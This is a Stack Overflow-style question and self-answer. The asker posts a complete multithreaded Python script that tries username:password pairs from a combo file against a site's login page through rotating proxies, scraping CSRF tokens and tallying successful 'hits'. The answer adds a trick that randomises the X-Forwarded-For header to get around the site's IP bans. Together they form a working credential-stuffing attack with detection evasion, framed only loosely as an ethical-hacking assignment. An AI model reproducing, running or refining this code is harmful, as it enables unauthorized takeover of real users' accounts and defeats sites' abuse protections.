# Sending Asynchronous requests with Python requests library

Tags: python, asynchronous, proxy, web-scraping, python-requests

As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:

```
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time


def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }


def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':') 
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))

        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1

        if status == 0:
            stats['fake'] += 1

        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1

        if status == -2:
            stats['Exception'] += 1

        user_queue.task_done()



def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)

        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http':proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
        'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }

        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http':proxy
                }
            )

        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))


def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),


if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time


    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
```

So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following

1. In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
2. The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
3. The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any  error, meaning my IP isn't exposed in any sense.

I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.

Comment: Why do you set the `X-Forwarded-For` header?

Comment: @MartijnPieters I read that most websites take the first parameter as the IP so it's an attempt to disclose my actual IP

Comment: So now your victim site thinks your computer is a proxy too and blacklists 8.8.8.8. Your *browser* won't set that header.

Comment: @MartijnPieters I can confirm that without using the header leaves me in the same situation

Comment: The answer is: requests is not async

Comment: @AndrésPérez-AlbelaH. can you elaborate? I've seen similar code work for a similar problem

Comment: @AndrésPérez-AlbelaH. Your understanding is incorrect, please check my answer

Answer (score 0):

I have figured out what the problem was, thanks to @[Martijn Pieters](https://stackoverflow.com/users/100297/martijn-pieters), as usual, he's a life saver.

I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using `X-Forwarded-For` to detect my root IP address.

Since elite level proxies do not expose the IP address and don't attach the `Client-IP` header, the only way the victim could detect my IP was using the latest address in `X-Forwarded-For`. The solution to this problem is setting the `X-Forwarded-For` header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.

```
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
```